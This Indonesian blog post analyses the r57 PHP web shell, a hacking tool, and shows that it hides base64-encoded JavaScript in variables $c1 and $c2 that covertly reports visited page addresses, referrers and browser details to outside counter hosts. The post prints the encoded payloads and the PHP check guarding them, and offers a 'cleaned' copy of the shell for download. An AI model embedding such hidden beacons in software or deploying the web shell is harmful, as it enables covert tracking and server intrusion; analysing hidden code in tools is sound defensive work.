Sebenarnya mungkin udah banyak yang tau.. bukan software yang digunakan yang aku titik beratkan disini.. tapi kehati-hatian kita menggunakan apa yang bukan buatan kita.. sapa tau ada sesuatu dibaliknya...
Singkat ajah.. nih aku ngebahas soal tool yang mungkin udah gak asing lagih ama yang biasa main ama keamanan suatu web atau server web yang ngedukung server side scripting yaitu "SHELL" yang menggunakan "interpreted language" kayak PHP . Disini aku nyontohin pake "r57 shell" yang bisa dengan mudah ditemukan di search engine.
Langsung yah.. Tau kenapa judulnya kukasih kayak begitu ?? karena aku pengen buktiin.. kalo tool hack ga semuanya punya maksud yang baik ( hehe.. mang ada yang baik ?? ya ada lah.. yang gak baik kan yang salah ngegunainnya ) . Disini aku nyontohin phpshell tadi dengan ilustrasi kode dibawah ini: bisa download dan bongkar sendiri :
ini aku temukan : coba cari variabel $c1 dan $c2 yang terenkripsi make base64. nih jelasnya :
$c1 =
Encoded :
PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==
Decoded :
=======================================================================================
$c2=
Encoded :
PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
ybmV0LS0+
Decoded :
========================================================================================
hotlog_js="1.0";hotlog_r=""+Math.random()+"&s=81606&im=1&r="+escape(document.referrer)+"&pg="+escape(window.location.href);document.cookie="hotlog=1; path=/"; hotlog_r+="&c="+(document.cookie?"Y":"N");hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled()?"Y":"N")hotlog_js="1.2";hotlog_r+="&wh="+screen.width+'x'+screen.height+"&px="+(((navigator.appName.substring(0,3)=="Mic"))?screen.colorDepth:screen.pixelDepth)hotlog_js="1.3"hotlog_r+="&js="+hotlog_js;document.write("")
Setelah diliat diatas.. dia tuh ngebikin rutin buat ngelog counter dan sepertinya jugak.. hehehe stealing something from you... liat sendiri lah yah di $c1 decoded version. Kalo misalnya variabel itu dihapus.. shell ga bakal jalan seperti diliat di fungsi dibawah :
fungsi :
if(empty($c1)||empty($c2)) { die(); }
$f = '
';
$f .= base64_decode($c1);
$f .= base64_decode($c2);
Jadi kalo mau dihapus , yah hapus $c1 , $c2 ama fungsi itu semuah.. baru normal lagi..
Tapi ini aku ngedit dari versi aslinya lho..
Alnya ada jugak yang dah ngubah atau nambahin script buat ngelog kedia.. dan dia naroh filenya di hosting dia.. kayak contohnya dulu di http://room-escape-games.com selain ngelog ke server yang bisa diliat di script diatas, dia jugak ngelog ke servernya.
Jadi .. Hati2 yah.. palagi para defacer tuh.. hehehe... lagi asik2nya nyoret2 di web.. eh ternyata dia ngantarin diri buat dicuri..
Hehehe...Juga buat para penetration tester.. hati2 yah... kita pengen baik malah jadi korban..
Jadi bersihin dulu yah toolnya.. tapi kalo males.. donlot ajah diwebku yang udah kubersihin.. di :
http://malcoder.info/clean.txt
Yah.. cek lagi lah sapa tau aku ada kelewatan.. tapi pas aku pake sih fine2 ajah.. alnya ga ada keluar lagih di status bar alamat2 asing.
oya maaf kalo ga semua script keliatan.. aku ga tau cara kerja situs jasakom apakah pake filtering yang kayak script gitu.. alnya berbentuk javascript.. jadi bukan salahku kalo script asli ga muncul..
greetz :
ALLAH SWT
MUHAMMAD SAW
by: http://jasakom.com
0 komentar:
Posting Komentar